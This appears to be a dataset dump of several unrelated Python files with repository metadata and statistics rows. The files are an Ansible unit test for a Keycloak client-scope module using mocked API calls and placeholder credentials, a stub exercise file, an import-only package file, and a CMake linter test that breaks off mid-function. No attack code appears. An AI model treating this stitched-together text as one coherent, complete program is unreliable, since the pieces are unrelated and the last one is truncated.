| 35.686667 | 82 | 0.747431 | 623 | 5,353 | 6.101124 | 0.101124 | 0.16101 | 0.078664 | 0.088924 | 0.936596 | 0.902394 | 0.902394 | 0.890818 | 0.87477 | 0.87477 | 0 | 0.009588 | 0.142724 | 5,353 | 149 | 83 | 35.926175 | 0.818697 | 0 | 0 | 0.610687 | 0 | 0 | 0.209415 | 0.201943 | 0 | 0 | 0 | 0 | 0.183206 | 1 | 0.061069 | false | 0 | 0.045802 | 0 | 0.10687 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0954562d95f0cf017a1529b2a0e989432244b4f2 | 27,475 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/identity/keycloak/test_keycloak_clientscope.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 22 | 2021-07-16T08:11:22.000Z | 2022-03-31T07:15:34.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/identity/keycloak/test_keycloak_clientscope.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/identity/keycloak/test_keycloak_clientscope.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 39 | 2021-07-05T02:31:42.000Z | 2022-03-31T02:46:03.000Z | # -*- coding: utf-8 -*-
# Copyright: (c) 2021, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from contextlib import contextmanager
from ansible_collections.community.general.tests.unit.compat import unittest
from ansible_collections.community.general.tests.unit.compat.mock import call, patch
from ansible_collections.community.general.tests.unit.plugins.modules.utils import AnsibleExitJson, AnsibleFailJson, \
ModuleTestCase, set_module_args
from ansible_collections.community.general.plugins.modules.identity.keycloak import keycloak_clientscope
from itertools import count
from ansible.module_utils.six import StringIO
@contextmanager
def patch_keycloak_api(get_clientscope_by_name=None, get_clientscope_by_clientscopeid=None, create_clientscope=None,
update_clientscope=None, get_clientscope_protocolmapper_by_name=None,
update_clientscope_protocolmappers=None, create_clientscope_protocolmapper=None,
delete_clientscope=None):
"""Mock context manager for patching the methods in PwPolicyIPAClient that contact the IPA server
Patches the `login` and `_post_json` methods
Keyword arguments are passed to the mock object that patches `_post_json`
No arguments are passed to the mock object that patches `login` because no tests require it
Example::
with patch_ipa(return_value={}) as (mock_login, mock_post):
...
"""
"""
get_clientscope_by_clientscopeid
delete_clientscope
"""
obj = keycloak_clientscope.KeycloakAPI
with patch.object(obj, 'get_clientscope_by_name', side_effect=get_clientscope_by_name) \
as mock_get_clientscope_by_name:
with patch.object(obj, 'get_clientscope_by_clientscopeid', side_effect=get_clientscope_by_clientscopeid) \
as mock_get_clientscope_by_clientscopeid:
with patch.object(obj, 'create_clientscope', side_effect=create_clientscope) \
as mock_create_clientscope:
with patch.object(obj, 'update_clientscope', return_value=update_clientscope) \
as mock_update_clientscope:
with patch.object(obj, 'get_clientscope_protocolmapper_by_name',
side_effect=get_clientscope_protocolmapper_by_name) \
as mock_get_clientscope_protocolmapper_by_name:
with patch.object(obj, 'update_clientscope_protocolmappers',
side_effect=update_clientscope_protocolmappers) \
as mock_update_clientscope_protocolmappers:
with patch.object(obj, 'create_clientscope_protocolmapper',
side_effect=create_clientscope_protocolmapper) \
as mock_create_clientscope_protocolmapper:
with patch.object(obj, 'delete_clientscope', side_effect=delete_clientscope) \
as mock_delete_clientscope:
yield mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope, \
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name, mock_update_clientscope_protocolmappers, \
mock_create_clientscope_protocolmapper, mock_delete_clientscope
def get_response(object_with_future_response, method, get_id_call_count):
if callable(object_with_future_response):
return object_with_future_response()
if isinstance(object_with_future_response, dict):
return get_response(
object_with_future_response[method], method, get_id_call_count)
if isinstance(object_with_future_response, list):
call_number = next(get_id_call_count)
return get_response(
object_with_future_response[call_number], method, get_id_call_count)
return object_with_future_response
def build_mocked_request(get_id_user_count, response_dict):
def _mocked_requests(*args, **kwargs):
url = args[0]
method = kwargs['method']
future_response = response_dict.get(url, None)
return get_response(future_response, method, get_id_user_count)
return _mocked_requests
def create_wrapper(text_as_string):
"""Allow to mock many times a call to one address.
Without this function, the StringIO is empty for the second call.
"""
def _create_wrapper():
return StringIO(text_as_string)
return _create_wrapper
def mock_good_connection():
token_response = {
'http://keycloak.url/auth/realms/master/protocol/openid-connect/token': create_wrapper(
'{"access_token": "alongtoken"}'), }
return patch(
'ansible_collections.community.general.plugins.module_utils.identity.keycloak.keycloak.open_url',
side_effect=build_mocked_request(count(), token_response),
autospec=True
)
class TestKeycloakAuthentication(ModuleTestCase):
def setUp(self):
super(TestKeycloakAuthentication, self).setUp()
self.module = keycloak_clientscope
def test_create_clientscope(self):
"""Add a new authentication flow from copy of an other flow"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'present',
'name': 'my-new-kc-clientscope'
}
return_value_get_clientscope_by_name = [
None,
{
"attributes": {},
"id": "73fec1d2-f032-410c-8177-583104d01305",
"name": "my-new-kc-clientscope"
}]
changed = True
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
# Verify number of call on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 2)
self.assertEqual(mock_create_clientscope.call_count, 1)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_create_clientscope_idempotency(self):
"""Add a new authentication flow from copy of an other flow"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'present',
'name': 'my-new-kc-clientscope'
}
return_value_get_clientscope_by_name = [{
"attributes": {},
"id": "73fec1d2-f032-410c-8177-583104d01305",
"name": "my-new-kc-clientscope"
}]
changed = False
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
# Verify number of call on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 1)
self.assertEqual(mock_create_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_delete_clientscope(self):
"""Add a new authentication flow from copy of an other flow"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'absent',
'name': 'my-new-kc-clientscope'
}
return_value_get_clientscope_by_name = [{
"attributes": {},
"id": "73fec1d2-f032-410c-8177-583104d01305",
"name": "my-new-kc-clientscope"
}]
changed = True
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
# Verify number of call on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 1)
self.assertEqual(mock_create_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 1)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_delete_clientscope_idempotency(self):
"""Add a new authentication flow from copy of an other flow"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'absent',
'name': 'my-new-kc-clientscope'
}
return_value_get_clientscope_by_name = [None]
changed = False
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
# Verify number of call on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 1)
self.assertEqual(mock_create_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_create_clientscope_with_protocolmappers(self):
"""Add a new authentication flow from copy of an other flow"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'present',
'name': 'my-new-kc-clientscope',
'protocolMappers': [
{
'protocol': 'openid-connect',
'config': {
'full.path': 'true',
'id.token.claim': 'true',
'access.token.claim': 'true',
'userinfo.token.claim': 'true',
'claim.name': 'protocol1',
},
'name': 'protocol1',
'protocolMapper': 'oidc-group-membership-mapper',
},
{
'protocol': 'openid-connect',
'config': {
'full.path': 'false',
'id.token.claim': 'false',
'access.token.claim': 'false',
'userinfo.token.claim': 'false',
'claim.name': 'protocol2',
},
'name': 'protocol2',
'protocolMapper': 'oidc-group-membership-mapper',
},
{
'protocol': 'openid-connect',
'config': {
'full.path': 'true',
'id.token.claim': 'false',
'access.token.claim': 'true',
'userinfo.token.claim': 'false',
'claim.name': 'protocol3',
},
'name': 'protocol3',
'protocolMapper': 'oidc-group-membership-mapper',
},
]
}
return_value_get_clientscope_by_name = [
None,
{
"attributes": {},
"id": "890ec72e-fe1d-4308-9f27-485ef7eaa182",
"name": "my-new-kc-clientscope",
"protocolMappers": [
{
"config": {
"access.token.claim": "false",
"claim.name": "protocol2",
"full.path": "false",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "a7f19adb-cc58-41b1-94ce-782dc255139b",
"name": "protocol2",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "protocol3",
"full.path": "true",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "2103a559-185a-40f4-84ae-9ab311d5b812",
"name": "protocol3",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "protocol1",
"full.path": "true",
"id.token.claim": "true",
"userinfo.token.claim": "true"
},
"consentRequired": "false",
"id": "bbf6390f-e95f-4c20-882b-9dad328363b9",
"name": "protocol1",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
}]
}]
changed = True
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
# Verify number of call on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 2)
self.assertEqual(mock_create_clientscope.call_count, 1)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_update_clientscope_with_protocolmappers(self):
"""Add a new authentication flow from copy of an other flow"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'present',
'name': 'my-new-kc-clientscope',
'protocolMappers': [
{
'protocol': 'openid-connect',
'config': {
'full.path': 'false',
'id.token.claim': 'false',
'access.token.claim': 'false',
'userinfo.token.claim': 'false',
'claim.name': 'protocol1_updated',
},
'name': 'protocol1',
'protocolMapper': 'oidc-group-membership-mapper',
},
{
'protocol': 'openid-connect',
'config': {
'full.path': 'true',
'id.token.claim': 'false',
'access.token.claim': 'false',
'userinfo.token.claim': 'false',
'claim.name': 'protocol2_updated',
},
'name': 'protocol2',
'protocolMapper': 'oidc-group-membership-mapper',
},
{
'protocol': 'openid-connect',
'config': {
'full.path': 'true',
'id.token.claim': 'true',
'access.token.claim': 'true',
'userinfo.token.claim': 'true',
'claim.name': 'protocol3_updated',
},
'name': 'protocol3',
'protocolMapper': 'oidc-group-membership-mapper',
},
]
}
return_value_get_clientscope_by_name = [{
"attributes": {},
"id": "890ec72e-fe1d-4308-9f27-485ef7eaa182",
"name": "my-new-kc-clientscope",
"protocolMappers": [
{
"config": {
"access.token.claim": "true",
"claim.name": "groups",
"full.path": "true",
"id.token.claim": "true",
"userinfo.token.claim": "true"
},
"consentRequired": "false",
"id": "e077007a-367a-444f-91ef-70277a1d868d",
"name": "groups",
"protocol": "saml",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "groups",
"full.path": "true",
"id.token.claim": "true",
"userinfo.token.claim": "true"
},
"consentRequired": "false",
"id": "06c518aa-c627-43cc-9a82-d8467b508d34",
"name": "groups",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "groups",
"full.path": "true",
"id.token.claim": "true",
"userinfo.token.claim": "true"
},
"consentRequired": "false",
"id": "1d03c557-d97e-40f4-ac35-6cecd74ea70d",
"name": "groups",
"protocol": "wsfed",
"protocolMapper": "oidc-group-membership-mapper"
}
]
}]
return_value_get_clientscope_by_clientscopeid = [{
"attributes": {},
"id": "2286032f-451e-44d5-8be6-e45aac7983a1",
"name": "my-new-kc-clientscope",
"protocolMappers": [
{
"config": {
"access.token.claim": "true",
"claim.name": "protocol1_updated",
"full.path": "true",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "a7f19adb-cc58-41b1-94ce-782dc255139b",
"name": "protocol2",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "protocol1_updated",
"full.path": "true",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "2103a559-185a-40f4-84ae-9ab311d5b812",
"name": "protocol3",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "false",
"claim.name": "protocol1_updated",
"full.path": "false",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "bbf6390f-e95f-4c20-882b-9dad328363b9",
"name": "protocol1",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
}
]
}]
changed = True
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name,
get_clientscope_by_clientscopeid=return_value_get_clientscope_by_clientscopeid) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
# Verify number of call on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 1)
self.assertEqual(mock_create_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 1)
self.assertEqual(mock_update_clientscope.call_count, 1)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 3)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 3)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
if __name__ == '__main__':
unittest.main()
| 44.674797 | 152 | 0.56182 | 2,547 | 27,475 | 5.753043 | 0.102474 | 0.069747 | 0.061148 | 0.047772 | 0.839419 | 0.817853 | 0.787347 | 0.760936 | 0.749608 | 0.736436 | 0 | 0.022839 | 0.343439 | 27,475 | 614 | 153 | 44.747557 | 0.789456 | 0.06162 | 0 | 0.676829 | 0 | 0 | 0.198657 | 0.057239 | 0 | 0 | 0 | 0 | 0.121951 | 1 | 0.028455 | false | 0.012195 | 0.01626 | 0.002033 | 0.065041 | 0.002033 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
11d9afe842e9863e4dad00533ad7d100b922c000 | 92 | py | Python | languages/python/exercises/concept/strings/strings.py | AlexLeSang/v3 | 3d35961a961b5a2129b1d42f1d118972d9665357 | [
"MIT"
] | 200 | 2019-12-12T13:50:59.000Z | 2022-02-20T22:38:42.000Z | languages/python/exercises/concept/strings/strings.py | AlexLeSang/v3 | 3d35961a961b5a2129b1d42f1d118972d9665357 | [
"MIT"
] | 1,938 | 2019-12-12T08:07:10.000Z | 2021-01-29T12:56:13.000Z | languages/python/exercises/concept/strings/strings.py | AlexLeSang/v3 | 3d35961a961b5a2129b1d42f1d118972d9665357 | [
"MIT"
] | 239 | 2019-12-12T14:09:08.000Z | 2022-03-18T00:04:07.000Z | def extract_message():
pass
def change_log_level():
pass
def reformat():
pass
| 10.222222 | 23 | 0.652174 | 12 | 92 | 4.75 | 0.666667 | 0.245614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 92 | 8 | 24 | 11.5 | 0.826087 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
01045568f732108860808fcfdec4b68ffdba0236 | 102 | py | Python | farmer/ncc/callbacks/__init__.py | aiorhiroki/farmer.tf2 | 5d78f4b47b753ab2d595829c17fef7c6061235b5 | [
"Apache-2.0"
] | null | null | null | farmer/ncc/callbacks/__init__.py | aiorhiroki/farmer.tf2 | 5d78f4b47b753ab2d595829c17fef7c6061235b5 | [
"Apache-2.0"
] | 7 | 2021-11-12T05:58:48.000Z | 2022-02-25T07:05:26.000Z | farmer/ncc/callbacks/__init__.py | aiorhiroki/farmer.tf2 | 5d78f4b47b753ab2d595829c17fef7c6061235b5 | [
"Apache-2.0"
] | null | null | null | from .keras_callbacks import *
from .keras_prune import KerasPruningCallback
from .functional import * | 34 | 45 | 0.843137 | 12 | 102 | 7 | 0.583333 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107843 | 102 | 3 | 46 | 34 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
012abf6291f1bed2134f4e993cadc72d3594fed2 | 14,399 | py | Python | test/test_find_variable_scopes.py | polysquare/polysquare-cmake-linter | 83f2f12d562b461f9d5bb700b0a17aa9f99751e0 | [
"MIT"
] | 5 | 2016-08-15T15:25:53.000Z | 2022-03-31T15:49:37.000Z | test/test_find_variable_scopes.py | polysquare/polysquare-cmake-linter | 83f2f12d562b461f9d5bb700b0a17aa9f99751e0 | [
"MIT"
] | 6 | 2015-01-01T17:05:25.000Z | 2018-02-01T02:31:09.000Z | test/test_find_variable_scopes.py | polysquare/polysquare-cmake-linter | 83f2f12d562b461f9d5bb700b0a17aa9f99751e0 | [
"MIT"
] | 1 | 2021-01-06T17:32:09.000Z | 2021-01-06T17:32:09.000Z | # /test/test_find_variable_scopes.py
#
# Tests that we're able to find variables inside the scopes that we expect
#
# See /LICENCE.md for Copyright information
"""Test that we're able to find variables inside the scopes that we expect."""
from test.warnings_test_common import Equals
from test.warnings_test_common import FUNCTIONS_SETTING_VARS
from test.warnings_test_common import format_with_command
from test.warnings_test_common import gen_source_line
from cmakeast import ast
from nose_parameterized import param, parameterized
from polysquarecmakelinter import find_variables_in_scopes
from polysquarecmakelinter.find_variables_in_scopes import VariableSource
from testtools import TestCase
from testtools.matchers import MatchesStructure
from testtools.matchers import Not
VarSrc = VariableSource
class TestFindVariablesInScopes(TestCase):
"""Test fixture for the in_tree function."""
params = [param(m) for m in FUNCTIONS_SETTING_VARS]
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_global_scope(self, matcher):
"""Test setting and finding vars with {} at global scope."""
script = "{0}".format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_in_func_scope(self, matcher):
"""Test setting and finding vars with {} in function scope."""
script = ("function (foo)\n"
" {0}\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_if_in_func_scope(self, matcher):
"""Test that using {} in an if block propagates variable to func."""
script = ("function (foo)\n"
" if (CONDITION)\n"
" {0}\n"
" endif (CONDITION)\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_elseif_in_func_scope(self, matcher):
"""Test that using {} in an elseif statement propagates variable."""
script = ("function (foo)\n"
" if (CONDITION)\n"
" elseif (CONDITION)\n"
" {0}\n"
" endif (CONDITION)\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_else_in_func_scope(self, matcher):
"""Test that using {} in an else statement propagates variable."""
script = ("function (foo)\n"
" if (CONDITION)\n"
" else (CONDITION)\n"
" {0}\n"
" endif (CONDITION)\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_while_in_func(self, matcher):
"""Test that using {} in a while block propagates variable to func."""
script = ("function (foo)\n"
" while (CONDITION)\n"
" {0}\n"
" endwhile (CONDITION)\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
@parameterized.expand(params, testcase_func_doc=format_with_command())
def test_foreach_in_func(self, matcher):
"""Test that using {} in an foreach statements propagates variable."""
script = ("function (foo)\n"
" foreach (VAR LISTVAR)\n"
" {0}\n"
" endforeach ()\n"
"endfunction ()\n").format(gen_source_line(matcher))
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VALUE")))
def test_foreach_scope(self):
"""Test that setting a variable in an foreach statements propagates."""
script = ("function (foo)\n"
" foreach (VAR LISTVAR)\n"
" endforeach ()\n"
"endfunction ()\n")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VAR")))
foreach_type = find_variables_in_scopes.ScopeType.Foreach
self.assertThat(global_scope.scopes[0].scopes[0].info,
MatchesStructure(type=Equals(foreach_type)))
def test_parent_scope(self):
"""Test that setting a variable in the parent scope propagates."""
script = ("function (foo)\n"
" function (other)\n"
" set (VARIABLE OTHER PARENT_SCOPE)\n"
" endfunction ()\n"
"endfunction ()\n")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VARIABLE")))
def test_cache_scope(self):
"""Test that setting a variable in the cache scope is global."""
script = ("function (foo)\n"
" function (other)\n"
" set (VARIABLE OTHER CACHE)\n"
" endfunction ()\n"
"endfunction ()\n")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.set_vars[0].node,
MatchesStructure(contents=Equals("VARIABLE")))
def test_global_setprop_scope(self):
"""Test that setting a variable in the set_property scope is global."""
script = ("function (foo)\n"
" function (other)\n"
" set_property (GLOBAL PROPERTY VARIABLE OTHER)\n"
" endfunction ()\n"
"endfunction ()\n")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.set_vars[0].node,
MatchesStructure(contents=Equals("VARIABLE")))
def test_func_var_scope(self):
"""Test function variable scope."""
script = ("function (foo VAR)\n"
"endfunction ()")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VAR")))
def test_macro_var_scope(self):
"""Test macro variable scope."""
script = ("macro (foo VAR)\n"
"endmacro ()")
global_scope = find_variables_in_scopes.set_in_tree(ast.parse(script))
self.assertThat(global_scope.scopes[0].set_vars[0].node,
MatchesStructure(contents=Equals("VAR")))
VARIABLE_USAGE_METHODS = [
"${VALUE}",
"${VALUE}_",
"${VALUE}_${OTHER}",
"${VALUE}/${OTHER}",
"${VARIABLE_${VALUE}_OTHER}",
"VALUE",
]
class TestUsedInTree(TestCase):
"""Test fixture for used_in_tree func."""
@parameterized.expand(VARIABLE_USAGE_METHODS)
def test_use_at_toplevel(self, call):
